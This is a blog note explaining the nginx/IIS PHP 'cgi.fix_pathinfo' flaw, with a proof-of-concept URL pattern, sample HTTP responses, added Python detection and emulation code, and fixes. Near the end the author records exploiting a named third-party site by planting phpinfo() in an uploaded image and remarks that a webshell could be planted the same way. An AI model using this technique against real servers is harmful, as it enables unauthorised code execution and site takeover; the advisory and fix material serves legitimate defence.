fastcgi security issues (fastcgi的安全问题)

(note.txt, 51CTO blog, obnus)

These notes follow the two 80sec advisories on web servers running php through CGI/FastCGI:

http://www.80sec.com/nginx-securit.html

http://www.80sec.com/iis-cgifastcgi-security-hol.html

In the usual setup nginx runs php through FastCGI with a location block like this:

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

This location matches any request whose URI ends in .php and hands it to the FastCGI backend. The file PHP should run is passed in SCRIPT_FILENAME, which nginx builds from $fastcgi_script_name, and $fastcgi_script_name is taken straight from the request URI; nginx does not split off a PATH_INFO. On the PHP side the cgi.fix_pathinfo option decides how a SCRIPT_FILENAME that does not name an existing file is handled. Suppose an image exists at

http://www.80sec.com/80sec.jpg

and the attacker requests

http://www.80sec.com/80sec.jpg/80sec.php

The URI is

/80sec.jpg/80sec.php

which matches the location, so nginx passes to fastcgi a SCRIPT_FILENAME of

/scripts/80sec.jpg/80sec.php

whereas a web server such as lighttpd would have set SCRIPT_FILENAME to

/scripts/80sec.jpg


When PHP runs under FastCGI with cgi.fix_pathinfo enabled (the default), it does not take SCRIPT_FILENAME at face value: if the file does not exist it strips trailing path components until it finds one that does, and treats the stripped remainder as PATH_INFO. PHP therefore ends up with SCRIPT_FILENAME and PATH_INFO of

/scripts/80sec.jpg and /80sec.php

and /scripts/80sec.jpg, an image, is executed as PHP code. On any nginx + php host, any file a user can get onto the server (an image, a text file) can therefore be run as a PHP script.


POC: on any nginx + php server, take a static file such as robots.txt and append /80sec.php to its URL.


Requesting http://www.80sec.com/robots.txt returns:

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

Requesting http://www.80sec.com/robots.txt/80sec.php returns:

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

The Content-Type changed from text/plain to text/html and an X-Powered-By: PHP header appeared: robots.txt was handed to PHP and executed as a script.

The note lists http://www.nginx.org itself among the sites where this could be observed.
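To turn the two captures above into a repeatable check, here is an added example (not from the note or from 80sec): it parses the response heads, builds the probe URL, and flags the case where the static file and its /80sec.php variant both return 200 but the probe comes back as PHP output. The two responses are constructed from the headers shown in the note rather than fetched; the function names are the example's own.

```python
"""Added example: spot a static file being executed as PHP from two responses."""
from typing import Dict, Tuple

# Constructed sample input: the two response heads from the note, not live traffic.
BASE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.6.32\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 18\r\n"
    "\r\n"
)
PROBE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.6.32\r\n"
    "Content-Type: text/html\r\n"
    "Transfer-Encoding: chunked\r\n"
    "X-Powered-By: PHP/5.2.6\r\n"
    "\r\n"
)


def parse_head(raw: str) -> Tuple[int, Dict[str, str]]:
    """Return (status code, header dict with lowercase names) from a raw response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def probe_url(static_url: str, suffix: str = "/80sec.php") -> str:
    """Build the PoC URL: the static file's URL with a bogus .php component appended."""
    return static_url.rstrip("/") + suffix


def media_type(headers: Dict[str, str]) -> str:
    """Content-Type without parameters, e.g. 'text/plain; charset=utf-8' -> 'text/plain'."""
    return headers.get("content-type", "").split(";")[0].strip().lower()


def pathinfo_executed(base_raw: str, probe_raw: str) -> bool:
    """True when the probe was handled by PHP instead of being served as the file.

    Signals: both requests succeed; PHP announces itself via X-Powered-By, or the
    probe's media type differs from the static file's (text/plain -> text/html
    in the note). A hardened server answers the probe with 403/404, so a
    non-200 status on either side rules the case out.
    """
    base_status, base = parse_head(base_raw)
    probe_status, probe = parse_head(probe_raw)
    if base_status != 200 or probe_status != 200:
        return False
    if "php" in probe.get("x-powered-by", "").lower():
        return True
    return media_type(base) != media_type(probe) and media_type(probe) in ("text/html", "")
```

Run it against the two captured heads and it reports the executed case; a server with the fix in place answers the probe with 403 or 404 and the check stays negative, as does a server that simply serves robots.txt again for the probe URL.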




Fix: set cgi.fix_pathinfo = 0 in php.ini, or add this rule inside the nginx php location so that a script name containing a dot, then a slash, then php is rejected:

if ( $fastcgi_script_name ~ \..*\/.*php ) {
    return 403;
}
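Added example (not from the note or from 80sec) tying the mechanism described above to the two fixes: it emulates how the nginx location builds SCRIPT_FILENAME, how php-cgi resolves it under cgi.fix_pathinfo=1 versus 0, and which script names the nginx rule blocks. The document root is a constructed in-memory set rather than a real filesystem, and the helper names are the example's own.

```python
"""Added example: nginx SCRIPT_FILENAME -> php-cgi fix_pathinfo resolution -> fixes."""
import re
from typing import Callable, Optional, Tuple

# Constructed document root standing in for the note's /scripts; only these exist.
DOCROOT_FILES = {"/scripts/80sec.jpg", "/scripts/robots.txt", "/scripts/index.php"}


def default_exists(path: str) -> bool:
    return path in DOCROOT_FILES


def nginx_script_filename(uri: str, root: str = "/scripts") -> str:
    """The location sets SCRIPT_FILENAME to /scripts$fastcgi_script_name; without
    fastcgi_split_path_info, $fastcgi_script_name is the whole request URI."""
    return root + uri


def php_resolve(script_filename: str, fix_pathinfo: bool,
                exists: Callable[[str], bool] = default_exists) -> Optional[Tuple[str, str]]:
    """Emulate php-cgi's handling of SCRIPT_FILENAME.

    Returns (file executed as PHP, PATH_INFO), or None when PHP refuses because
    no file matches. With cgi.fix_pathinfo=1 PHP strips trailing path components
    until it finds an existing file and treats the remainder as PATH_INFO; with
    cgi.fix_pathinfo=0 it only accepts SCRIPT_FILENAME exactly as given.
    """
    if exists(script_filename):
        return script_filename, ""
    if not fix_pathinfo:
        return None
    path = script_filename
    while "/" in path:
        path = path.rpartition("/")[0]  # drop the last component
        if path and exists(path):
            return path, script_filename[len(path):]
    return None


# The rule from the note: a dot, then later a slash, then "php" somewhere after it,
# e.g. /80sec.jpg/80sec.php. Side effect: /some.dir/index.php is rejected as well.
NGINX_BLOCK_RULE = re.compile(r"\..*\/.*php")


def nginx_rule_blocks(fastcgi_script_name: str) -> bool:
    return NGINX_BLOCK_RULE.search(fastcgi_script_name) is not None


def request_outcome(uri: str, fix_pathinfo: bool, nginx_rule: bool) -> str:
    """What happens to one request URI under a given combination of settings."""
    if nginx_rule and nginx_rule_blocks(uri):
        return "403 blocked by nginx rule"
    resolved = php_resolve(nginx_script_filename(uri), fix_pathinfo)
    if resolved is None:
        return "404 no input file"
    executed, path_info = resolved
    return f"PHP executes {executed} with PATH_INFO={path_info!r}"
```

With the defaults (fix_pathinfo=1, no rule) /robots.txt/80sec.php runs /scripts/robots.txt as PHP; either fix stops it. cgi.fix_pathinfo = 0 is the more complete of the two, since it removes the behaviour in PHP itself, while the nginx regex only filters script names and also rejects legitimate scripts under any directory whose name contains a dot.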

IIS has the same problem when PHP runs in CGI mode. After 80sec's nginx advisory, IIS with PHP under CGI/FAST-CGI was found to behave the same way: get a file containing php code (Phpinfo, for instance) onto the server and request it with a php name appended, e.g.

http://www.80sec.com/robots.txt/1.php

and the HTTP response shows that PHP executed the file. The existing file does not have to be PHP-related at all; on an IIS host an asp file serves just as well:

http://www.80sec.com/some.asp/1.php

Fix: cgi.fix_pathinfo = 0, as above.



A test against a live site (the note's own record). Requesting

http://www.baoji360.com/1.jpg

gives

404 Not Found

——————————————————————————–

nginx/0.7.63

so the web server is nginx 0.7.63. The site accepts member logo uploads in jpg/jpeg/png/gif at 100*100. A 100*100 jpg was opened in ue and phpinfo() inserted into it, then uploaded as the jpg; requesting the uploaded jpg with /a.php appended in ie displayed the phpinfo() output, so a php webshell could be uploaded the same way……….

The uploaded image: http://www.baoji360.com/dat/upload/member_logo/201005/sex.jpg

Executed as PHP: http://www.baoji360.com/dat/upload/member_logo/201005/sex.jpg/a.php



superhei of 80vul noted the same thing for txt files: put php code into a txt file on the web server and request it as xxxx/xx.txt/a.php.

